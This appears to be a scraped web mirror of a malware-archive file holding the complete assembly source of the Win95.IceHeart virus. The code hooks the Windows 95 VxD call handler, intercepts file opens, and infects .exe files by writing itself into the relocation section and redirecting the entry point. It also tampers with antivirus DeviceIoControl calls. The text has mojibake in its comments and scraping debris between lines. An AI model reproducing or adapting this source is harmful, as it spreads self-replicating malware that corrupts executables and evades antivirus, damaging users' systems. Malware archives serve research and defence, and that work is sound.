mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-21 02:46:10 +00:00
286 lines
4.6 KiB
NASM
286 lines
4.6 KiB
NASM
;last review 29.06.1999
|
||
|
||
;"—?® ? ??®? - ??? «?¤..."
|
||
;Win95.IceHeart v1.5
|
||
;(c) 1998-xxxx Stainless Steel Rat /2Rats /RVA /IkX
|
||
jumps
|
||
.386
|
||
.model flat,stdcall
|
||
|
||
extrn ExitProcess:PROC
|
||
.code
|
||
start:
|
||
_start:
|
||
cld
|
||
call _Next
|
||
_Next:
|
||
pop esi
|
||
sub esi,offset _Next
|
||
push ebp
|
||
cmp byte ptr [esp+3+4],0BFh
|
||
jne _ExitNow;NT
|
||
mov ebp,_krnl_begin+178h+0Ch-40
|
||
_DoSearchSection:
|
||
add ebp,40
|
||
mov edx,[ebp];first rva
|
||
test edx,edx
|
||
jz _ExitNow
|
||
cmp dword ptr [ebp+24h-0Ch],0D0000040h;attr
|
||
jne _DoSearchSection
|
||
mov eax,[ebp+0Ch+40-0Ch];second rva
|
||
mov ebx,eax
|
||
sub eax,edx;rva delta
|
||
sub eax,[ebp+8-0Ch];virtual size
|
||
cmp ah,(virlen_in_mem/256)+1
|
||
jb _DoSearchSection
|
||
;in ebx second rva
|
||
;in edx virtual size
|
||
_SectionForUs:
|
||
sub ebx,eax
|
||
lea edi,[_krnl_begin+ebx]
|
||
|
||
lea ebp,[edi+offset _SecondStart-offset _start]
|
||
pusha
|
||
lea esi,[esi+offset _start]
|
||
|
||
_ResidencyCheck:
|
||
xor ecx,ecx
|
||
cmp byte ptr [edi],cl
|
||
jne _ExitNow2
|
||
mov ch,(virlen_in_mem/256)+1
|
||
rep movsb
|
||
call ebp
|
||
_ExitNow2:
|
||
popa
|
||
_ExitNow:
|
||
pop ebp
|
||
jmp dword ptr [offset _old_eip+esi]
|
||
|
||
_SecondStart:
|
||
mov esi,dword ptr ds:[_krnl_begin+_1st_export+0Ah]
|
||
sub ebp,offset _SecondStart
|
||
lea edi,[offset _old_vxd_call+ebp]
|
||
push esi
|
||
movsd
|
||
movsw
|
||
lea eax,[ebp+offset _Handler]
|
||
pop edi
|
||
stosd
|
||
mov ax,cs
|
||
stosw
|
||
_InitSomeVars:
|
||
mov dword ptr [offset _RelocFix+ebp+1],ebp
|
||
lea eax,[offset _old_vxd_call+ebp]
|
||
mov dword ptr [ebp+offset _JmpFword+2],eax
|
||
retn
|
||
|
||
_Handler:
|
||
pusha
|
||
_RelocFix:
|
||
mov ebp,11223344h
|
||
_CheckBusyFlag:
|
||
lea ecx,[offset _busy_flag+ebp]
|
||
xor edx,edx
|
||
cmp byte ptr [ecx],dl
|
||
jne _Exit_Handler
|
||
mov dl,0C0h
|
||
cmp eax,2A0040h;id of DeviceIoControl
|
||
jne _CheckInt21Call
|
||
_CheckAvpCalls:
|
||
cmp word ptr [edx+esp+2],22h
|
||
jne _Exit_Handler
|
||
not dword ptr [edx+esp];i think, avp likes api code,like this ;)
|
||
|
||
_CheckInt21Call:
|
||
cmp eax,2A0010h;calling int 21h ?
|
||
jne _Exit_Handler
|
||
cmp word ptr [esp+44],716Ch;openfile ?
|
||
je _Infect_It
|
||
|
||
_Exit_Handler:
|
||
popa
|
||
_JmpFword:
|
||
jmp fword ptr ds:[offset _old_vxd_call]
|
||
|
||
_Infect_It:
|
||
|
||
not byte ptr [ecx]
|
||
mov edi,esi
|
||
xor eax,eax
|
||
cld
|
||
push ecx
|
||
|
||
push eax
|
||
|
||
mov ecx,esp
|
||
repnz scasb
|
||
pop ecx
|
||
|
||
mov eax,dword ptr [edi-5]
|
||
or eax,20202000h
|
||
cmp eax,'exe.'
|
||
; cmp eax,'eci.'
|
||
|
||
|
||
jne _ExitInfector
|
||
_InfectFile:
|
||
xor byte ptr [offset _Name+4+ebp],13
|
||
|
||
_AllocStack:
|
||
mov ch,4;1024
|
||
sub esp,ecx
|
||
push ecx
|
||
_OpenFile:
|
||
xor edi,edi
|
||
xor eax,eax
|
||
cdq
|
||
|
||
inc edx
|
||
mov ebx,edx
|
||
inc ebx
|
||
mov ax,716Ch
|
||
call _Int21h
|
||
xchg eax,ebx
|
||
jc _FreeStack
|
||
mov ah,3Fh
|
||
call _Process_1024b
|
||
cmp ecx,eax
|
||
jne _CloseJmp
|
||
mov eax,[edi+3Ch]
|
||
shr ecx,1
|
||
cmp eax,ecx
|
||
jae _CloseJmp
|
||
add edi,eax
|
||
mov eax,[edi]
|
||
inc eax;heuristics sucks
|
||
cmp ax,'EP'+1;sign
|
||
jne _CloseJmp
|
||
cmp byte ptr [edi+61h],7Dh;winzip's sfx stack size
|
||
je _CloseJmp
|
||
_CheckAlreadyInfected:
|
||
|
||
|
||
cmp byte ptr [edi+1Ah],al
|
||
je _CloseJmp
|
||
mov byte ptr [edi+1Ah],al
|
||
test byte ptr [edi+23],22h;dll or fixed image
|
||
jne _CloseJmp
|
||
mov byte ptr [edi+23],0;strip reloc
|
||
mov edx,dword ptr [edi+160];fixup section
|
||
test edx,edx
|
||
je _CloseJmp
|
||
push edx
|
||
xchg dword ptr [edi+40],edx;entry point
|
||
add edx,dword ptr [edi+48+4];image base
|
||
mov dword ptr [offset _old_eip+ebp],edx
|
||
pop edx
|
||
|
||
_AnalyzePlaceInFixupArea:
|
||
|
||
mov ecx,[edi+6]
|
||
lea esi,[edi+0F8h+12];rva
|
||
|
||
_DoAnalyzeSections:
|
||
lodsd
|
||
cmp eax,edx;search section with rva=fixup rva
|
||
je _OkiFixupOur
|
||
add esi,40-4
|
||
loop _DoAnalyzeSections
|
||
_CloseJmp:
|
||
jmp _Close
|
||
_OkiFixupOur:
|
||
lodsd;phys size
|
||
mov edx,virlen
|
||
cmp eax,edx
|
||
jb _CloseJmp
|
||
mov dword ptr [esi-12],edx
|
||
push edx
|
||
lodsd;phyz ofs
|
||
|
||
|
||
_Int21CallOptimization:
|
||
lea esi,[ebp+offset _Int21h]
|
||
|
||
|
||
_SeekToEnd:
|
||
|
||
push eax
|
||
pop dx
|
||
pop cx
|
||
mov ax,4200h
|
||
call esi
|
||
|
||
_WriteSelf:
|
||
mov ah,40h
|
||
lea edx,[ebp+offset _start]
|
||
pop ecx
|
||
call esi
|
||
|
||
_WriteHeader:
|
||
xor eax,eax
|
||
mov ah,42h
|
||
cdq
|
||
call esi
|
||
|
||
mov ah,40h
|
||
call _Process_1024b
|
||
|
||
_Close:
|
||
mov ah,3Eh
|
||
call _Int21h
|
||
|
||
_FreeStack:
|
||
pop ecx
|
||
add esp,ecx
|
||
|
||
_ExitInfector:
|
||
pop ecx
|
||
not byte ptr [ecx]
|
||
jmp _Exit_Handler
|
||
|
||
|
||
_Process_1024b:
|
||
lea edi,[esp+4+4]
|
||
xor ecx,ecx
|
||
mov ch,4;1024
|
||
mov edx,edi
|
||
_Int21h:
|
||
push ecx
|
||
push ebp
|
||
push ecx eax
|
||
push 2A0010h
|
||
mov ebp,_krnl_begin+_1st_export
|
||
call ebp
|
||
pop ebp
|
||
pop ecx
|
||
retn
|
||
|
||
|
||
|
||
|
||
_Name db 'Win95.iCE-hEART',0
|
||
_Msg db '? ? ?? , ? ???? ??§?¬® «??«? !',0
|
||
|
||
_old_eip dd offset ExitProcess
|
||
virlen equ $-offset start
|
||
_old_vxd_call db 6 dup ('')
|
||
_busy_flag db ''
|
||
virlen_in_mem equ $-offset start
|
||
|
||
ends
|
||
|
||
.data
|
||
db 13,10
|
||
|
||
_krnl_begin equ 0BFF70000h
|
||
_1st_export equ 13D4h
|
||
end start
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|